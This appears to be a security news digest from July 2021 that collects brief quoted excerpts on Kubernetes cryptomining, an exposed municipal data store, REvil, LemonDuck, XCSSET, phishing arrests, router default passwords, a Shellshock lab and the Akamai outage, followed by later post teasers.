OSN July 23, 2021

Fortify Security Team
Jul 23, 2021

Title: Researchers Find New Attack Vector Against Kubernetes Clusters via Misconfigured Argo Workflows Instances

Date Published: July 23, 2021


Excerpt: “Some cyberattackers have been able to take advantage of misconfigured permissions that give them access to an open Argo dashboard where they can submit their own workflow. The “kannix/monero-miner,” according to the researchers, requires little skill to use and the report notes that other security teams have discovered large-scale cryptocurrency mining attack against Kubernetes clusters. “In Docker Hub there are still a number of options for Monero mining that attackers can use. With a simple search it shows that there are at least 45 other containers with millions of downloads,” the study said.”

Title: Over 80 Us Municipalities’ Sensitive Information, Including Resident’s Personal Data, Left Vulnerable in Massive Data Breach

Date Published: July 23, 2021


Excerpt: “Over 100 US cities appeared to be using the same product, mapsonline.net, provided by an American company named PeopleGIS. The data of these municipalities was stored in several misconfigured Amazon S3 buckets that were sharing similar naming conventions to MapsOnline. Due to this, we believe these cities are using the same software solution. Our team reached out to the company and the buckets have since been secured. PeopleGIS is a Massachusetts-based company specializing in information management software. Many city municipalities in the state of Massachusetts and a few in surrounding states like Connecticut and New Hampshire use their software and platforms to manage a variety of data.”

Title: Kaseya Obtains Universal Decryptor for Revil Ransomware Victims

Date Published: July 22, 2021


Excerpt: “Kaseya received a universal decryptor that allows victims of the July 2nd REvil ransomware attack to recover their files for free. On July 2nd, the REvil ransomware operation launched a massive attack by exploiting a zero-day vulnerability in the Kaseya VSA remote management application to encrypt approximately sixty managed service providers and an estimated 1,500 businesses. After the attack, the threat actors demanded $70 million for a universal decryptor, $5 million for MSPs, and $40,000 for each extension encrypted on a victim’s network.”

Title: Microsoft Warns Over This Unusual Malware That Targets Windows and Linux

Date Published: July 23, 2021


Excerpt: “Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.” Cisco’s Talos malware researchers have been scoping out the group’s Exchange activities too. It found LemonDuck was using automated tools to scan, detect, and exploit servers before loading payloads such as the Cobalt Strike pen-testing kit — a favored tool for lateral movement — and web shells, allowing malware to install additional modules.”

Title: Nasty Macos Malware Xcsset Now Targets Google Chrome, Telegram Software

Date Published: July 23, 2021


Excerpt: “The malware comes with numerous capabilities, such as reading and dumping Safari cookies, injecting malicious JavaScript code into various websites, stealing information from applications, such as Notes, WeChat, Skype, Telegram, and encrypting user files. Earlier this April, XCSSET received an upgrade that enabled the malware authors to target macOS 11 Big Sur as well as Macs running on M1 chipset by circumventing new security policies instituted by Apple in the latest operating system.”

Title: Dutch Police Arrest Two Hackers Tied to “Fraud Family” Cybercrime Ring

Date Published: July 23, 2021


Excerpt: “The apprehended suspects, a 24-year-old software engineer and a 15-year-old boy, are said to have been the main developer and seller of the phishing frameworks that were employed to collect login data from bank customers. The attacks primarily singled out users in the Netherlands and Belgium. Believed to be active since at least 2020, the cybercriminal syndicate has been codenamed “Fraud Family” by cybersecurity firm Group-IB. The frameworks come with phishing kits, tools designed to steal information, and web panels, which allow the fraudsters to interact with the actual phishing site in real time and retrieve the stolen user data.”

Title: Popular Wi-fi Routers Still Using Default Passwords Making Them Susceptible to Attacks

Date Published: July 22, 2021


Excerpt: “A router with the default access credentials could grant malicious actors a foothold into your home network and even to the devices connected to it. Once they have their foot in the door, the cybercriminals could use the access to monitor what any device connected to the router is doing, what websites they’re browsing, and they could see any unencrypted data being sent over the network. Moreover, the threat actors could also abuse your connection to download pirated content or use it to access illegal materials, potentially making you a suspect or being liable for these activities.”

Title: Exploiting Shellshock (CVE-2014–6271) on a Remote Server (Inside Lab)

Date Published: July 19, 2021


Excerpt: “Using nikto I confirmed that our target is vulnerable to shellshock vulnerability (cve-2014–6271). I searched on google for a brief description of the shellshock vulnerability and found out that shellshock allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. I also discovered that an exploit for this vulnerability exists on metasploit. So I went ahead to fire up metasploit in my terminal.”

Title: Akamai Software Update Triggered a Bug That Took Offline Major Sites

Date Published: July 23, 2021


Excerpt: “A software configuration update triggered a bug in the Akamai DNS which took offline major websites, including Steam, the PlayStation Network, AWS, Google, and Salesforce. “A software configuration update triggered a bug in the DNS (domain name system) system, the system that directs browsers to websites,” reads a statement published by Akamai. “This caused a disruption impacting availability of some customer websites.” According to the company, around 500 of its customers were impacted by the incident. In order to restore operations, the company rolled back the update. The company recognized the impact of this issue and apologized to its customers.”

Title: Microsoft Has a Workaround for ‘Hivenightmare’ Flaw: Nuke Your Shadow Copies From Orbit

Date Published: July 22, 2021


Excerpt: “It’s hardly an ideal solution, since those shadow copies could have been taken for a good reason (rather than Microsoft just firing off the operation when it feels like it). As the CVE update notes: “Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.” However, the issue is that those shadow copies could contain files to which miscreants might gain access, including private data such as credentials.”

Recent Posts

June 10, 2022

Title: Bizarre Ransomware Sells Decryptor on Roblox Game Pass Store Date Published: June 9, 2022 https://www.bleepingcomputer.com/news/security/bizarre-ransomware-sells-decryptor-on-roblox-game-pass-store/ Excerpt: “A new ransomware is taking the unusual approach of...

June 9, 2022

Title: New Symbiote Malware Infects all Running Processes on Linux Systems Date Published: June 9, 2022 https://www.bleepingcomputer.com/news/security/new-symbiote-malware-infects-all-running-processes-on-linux-systems/ Excerpt: “A newly discovered Linux malware known...

June 8, 2022

Title: Surfshark, ExpressVPN pull out of India Over Data Retention Laws Date Published: June 7, 2022 https://www.bleepingcomputer.com/news/legal/surfshark-expressvpn-pull-out-of-india-over-data-retention-laws/ Excerpt: “Surfshark announced today they are shutting down...

June 6, 2022

Title: Italian City of Palermo Shuts Down all Systems to Fend off Cyberattack Date Published: June 6, 2022 https://www.bleepingcomputer.com/news/security/italian-city-of-palermo-shuts-down-all-systems-to-fend-off-cyberattack/ Excerpt: “The municipality of Palermo in...

June 3, 2022

Title: Critical Atlassian Confluence Zero-Day Actively Used in Attack Date Published: June 2, 2022 https://www.bleepingcomputer.com/news/security/critical-atlassian-confluence-zero-day-actively-used-in-attacks/ Excerpt: “Hackers are actively exploiting a new Atlassian...

June 2, 2022

Title: Conti Ransomware Targeted Intel Firmware for Stealthy Attacks Date Published: June 2, 2022 https://www.bleepingcomputer.com/news/security/conti-ransomware-targeted-intel-firmware-for-stealthy-attacks/ Excerpt: “Researchers analyzing the leaked chats of the...

June 1, 2022

Title: Ransomware Attacks Need Less Than Four Days to Encrypt Systems Date Published: June 1, 2022 https://www.bleepingcomputer.com/news/security/ransomware-attacks-need-less-than-four-days-to-encrypt-systems/ Excerpt: “The duration of ransomware attacks in 2021...